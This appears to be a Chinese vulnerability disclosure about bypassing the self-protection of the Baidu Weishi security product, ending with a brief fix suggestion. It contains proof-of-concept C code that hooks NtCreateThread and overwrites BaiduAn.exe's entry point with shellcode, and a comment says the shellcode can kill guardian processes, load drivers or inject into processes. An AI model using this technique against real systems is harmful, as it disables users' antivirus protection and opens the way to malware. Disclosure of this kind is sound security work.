开启百度卫士全防御环境下,普通用户态程序即可杀掉百度卫士所有守护进程。
1.触发exp:
2.exp运行后:
3.恶意程序轻易注入explorer:
LONG WINAPI NewCreateThread(PVOID p1, PVOID p2, PVOID p3, PVOID p4, PVOID p5, PVOID p6,PVOID p7,PVOID p8){// 修改EXE镜像入口点VirtualProtectEx(p4, (LPVOID)0x4027EF, 0x400, PAGE_EXECUTE_READWRITE, &oldProtect);// shellcode可以是任意代码,结束守护进程、装驱动、注入......WriteProcessMemory(p4, (LPVOID)0x4027EF, shellCode, sizeof(shellCode), &dwWrite);return lRes = (fnCreateThread)(p1, p2, p3, p4, p5, p6,p7,p8);}LPCTSTR lpszProcess = _T("C:\\Program Files\\Baidu\\BaiduAn\\4.0.0.4830\\BaiduAn.exe");PROCESS_INFORMATION pi = { 0 };STARTUPINFO si = { 0 };si.cb = sizeof(STARTUPINFO);DetourProc((PVOID)GetProcAddress(GetModuleHandle(_T("ntdll")), "NtCreateThread"), (PVOID)NewCreateThread, (PVOID*)(&fnCreateThread));CreateProcess(lpszProcess, NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
修复方案:
加强自保护的防御覆盖度
……